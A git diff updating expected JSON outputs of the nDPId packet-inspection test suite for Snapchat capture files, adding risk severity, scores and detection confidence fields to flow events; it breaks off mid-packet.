diff --git a/test/results/snapchat.pcap.out b/test/results/snapchat.pcap.out
index 58008ff5f..08396485a 100644
--- a/test/results/snapchat.pcap.out
+++ b/test/results/snapchat.pcap.out
@@ -3,8 +3,8 @@
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431417993318,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431417993318,"pkt":"ABoRAAACABoRAAABCABFAAA8f1tAAEAG3k0KCAABSn2IjYHRAbtgYhiTAAAAAKAC\/\/8GegAAAgQFtAQCCAoAKmfIAAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1431417993319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431417993319,"pkt":"ABoRAAACABoRAAABCABFAAAoAalAABAGjBRKfYiNCggAAQG7gdGfnedsYGIYlFAS\/\/9PMgAA"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1431417993322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431417993322,"pkt":"ABoRAAACABoRAAABCABFAAAof1xAAEAG3mAKCAABSn2IjYHRAbtgYhiUn53nbVAQ\/\/9PMwAA"}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431417993318,"flow_last_seen":1431417993373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1431417993373,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431417993318,"flow_last_seen":1431417993476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1431417993476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431417993318,"flow_last_seen":1431417993373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1431417993373,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01106{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431417993318,"flow_last_seen":1431417993476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1431417993476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431418008131,"flow_last_seen":1431418008131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431418008131,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1431418008131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431418008131,"pkt":"ABoRAAACABoRAAABCABFAAA8OQ1AAEAGJJwKCAABSn2Ija34AbvuolTmAAAAAKAC\/\/8JnAAAAgQFtAQCCAoAKm3rAAAAAAEDAwY="}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1431418008132,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431418008132,"pkt":"ABoRAAACABoRAAABCABFAAAoAeJAABAGi9tKfYiNCggAAQG7rfgRXasZ7qJU51AS\/\/8jCwAA"}
@@ -13,10 +13,10 @@
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1431418008135,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431418008135,"pkt":"ABoRAAACABoRAAABCABFAAAoAeRAABAGi9lKfYiNCggAAQG724HUfVLFK4KtO1AS\/\/\/1gQAA"}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1431418008135,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431418008135,"pkt":"ABoRAAACABoRAAABCABFAAAoOQ5AAEAGJK8KCAABSn2Ija34AbvuolTnEV2rGlAQ\/\/8jDAAA"}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1431418008136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431418008136,"pkt":"ABoRAAACABoRAAABCABFAAAowNJAAEAGnOoKCAABSn2IjduBAbsrgq071H1SxlAQ\/\/\/1ggAA"}
-00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008131,"flow_last_seen":1431418008138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1431418008138,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
-00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008133,"flow_last_seen":1431418008141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1431418008141,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
-00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008131,"flow_last_seen":1431418008294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
-00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008133,"flow_last_seen":1431418008294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
+00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008131,"flow_last_seen":1431418008138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1431418008138,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008133,"flow_last_seen":1431418008141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1431418008141,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008131,"flow_last_seen":1431418008294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
+00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008133,"flow_last_seen":1431418008294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431417993318,"flow_last_seen":1431417995589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1671,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431418008133,"flow_last_seen":1431418008853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1069,"flow_tot_l4_payload_len":3005,"flow_avg_l4_payload_len":176,"midstream":0,"ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431418008131,"flow_last_seen":1431418008701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2439,"flow_avg_l4_payload_len":143,"midstream":0,"ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -29,10 +29,10 @@
 ~~ total active/idle flows...: 3/3
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4605015 bytes
-~~ total memory freed........: 4605015 bytes
-~~ total allocations/frees...: 99620/99620
+~~ total memory allocated....: 4689312 bytes
+~~ total memory freed........: 4689312 bytes
+~~ total allocations/frees...: 101210/101210
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
-~~ json string max len.......: 925 chars
-~~ json string avg len.......: 613 chars
+~~ json string max len.......: 1111 chars
+~~ json string avg len.......: 706 chars
diff --git a/test/results/snapchat_call.pcapng.out b/test/results/snapchat_call.pcapng.out
index 4089434ef..7a0e4df34 100644
--- a/test/results/snapchat_call.pcapng.out
+++ b/test/results/snapchat_call.pcapng.out
@@ -1,10 +1,10 @@
 00447{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"snapchat_call.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595865799020,"flow_last_seen":1595865799020,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1595865799020,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02238{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595865799020,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1595865799020,"pkt":"CL6sCxdumt9Y+uvcCABFAAViAIdAAEARymzAqAypEriKjqRjAbsFTpy2w1EwNDZQw4BG53qjBuoAAAABZPU1L7U5tyJMVD1ioAEEAENITE8MAAAAUEFEAEgDAABWRVIATAMAAENDUwBcAwAAUERNRGADAABTTUhMZAMAAElDU0xoAwAATk9OUIgDAABNSURTjAMAAFNDTFOQAwAAQ1NDVJADAABDRkNXlAMAAFNGQ1eYAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tUTA0NgHogWCSkhrofu2AhqIVgpFYNTA5AQAAACgAAAAzbE4qRvvkp4rlFQIkD4jjmdOAAP5SZ2hG5WgHAg7x+2QAAAABAAAAAEAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595865799020,"flow_last_seen":1595865799020,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1595865799020,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"24":"SNI TLS extension was missing"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595865799020,"flow_last_seen":1595865799020,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1595865799020,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {}}
 02274{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595865799037,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1595865799037,"pkt":"mt9Y+uvcCL6sCxduCABFAAVi60BAACUR+rISuIqOwKgMqQG7pGMFThqhw1EwNDYFw4BG53qjBuoAAAABHHnqt4ztMz51vP6XgAFSRUoABwAAAFNUSwA5AAAAU05PAG0AAABQUk9GtAAAAFNDRkc7AQAAUlJFSj8BAABTVFRMRwEAAENSVP9OBwAAbUU2ixV5Jj1qHEQQZYOHtdotUTPKCy0omzKN6SE7STZ4\/rKMxZ9\/rrj8l9tx+PhU9mRQzeJZ+1Dabp0JaMw4Ax2lLo8wBUBdtg1GpS3urBIhqVx\/8nRPLB1cTLrUpB570Ce5EPUwnKR9lOYP4jBFAiB3SpfbIfQpyAe+ZsA1KXWbSYFVXmlAhM9hKVIcNwAFzwIhAKINNKjm9Y0DRmywB4GeockL0Y3PJJ2PTHmxvqAl6rucU0NGRwYAAABBRUFECAAAAFNDSUQYAAAAUFVCUzsAAABLRVhTPwAAAE9CSVRHAAAARVhQWU8AAABBRVNHQ0MyMAO\/Pud+GiRqUM930xoSwNMgAAAzgoMwBXTcjfX\/uLgWESbe\/GDn3+Z5Wy5eude5hIrxK0MyNTUy3iwBeDJ0hdzKD01zAQAADAAAAHLO80MAAAAAAQEA6ggAAHi7IlF+sTNiZQCWXKx6Bk0smxcAyyAmJgFO2z2LJtgwHuFZfF6JuflcqgEXGwewWDpny8LMbOCDWiSJGghD0i2PS2Z6Jqg4ACVbQzWg\/8FJRBYu7OrsjFmUAwsFIwNgXkJkLSMjUNYyNAJzDVJQbYOmUQ5hLmdg+knLL8rLTIQ5gV2YJzgxryRRwTc\/Dxh4hkIGAhCXcQbnJRZAMhNUKTMPj5YeMFhzMstS9TLzDSKBwuxgHzIxQr3KzMjO7MTA0igTPiXBhk\/onni666rTEwW2GV7P0HIt5RAIXKgqHG0lyz+LaQ37Sb9X68wmMzzfpJMbI+6\/war2EINr2z3pHSav6hc3MccaNDFHokTO4rnP5H\/esvQ\/kPdi4umpS28ZPuKaj1RHBL7\/ujNAPVOn37WS752O83bRN1k7DJRB0oIsMgZSTShub+JC8gdKYcjeQKjszISUlUkGCQZ6C3QWaLVpIMpKY72UTKR8UVycnKibmpysm24IrtEw1JvgV+8DKQhdDZyBxSOkYfA3h5ERX\/GLYp5zQLABBxtbeiMPMIEaVCPltXyDXNx5DdkMA1ekvGYJc3kiSLoY1TJYkgWmWEiCRSp3StBqrCbGWjYucEl5rZKJhYmliTEXiDMZ0xnKGNyWhr4u\/TVRwWDros7ML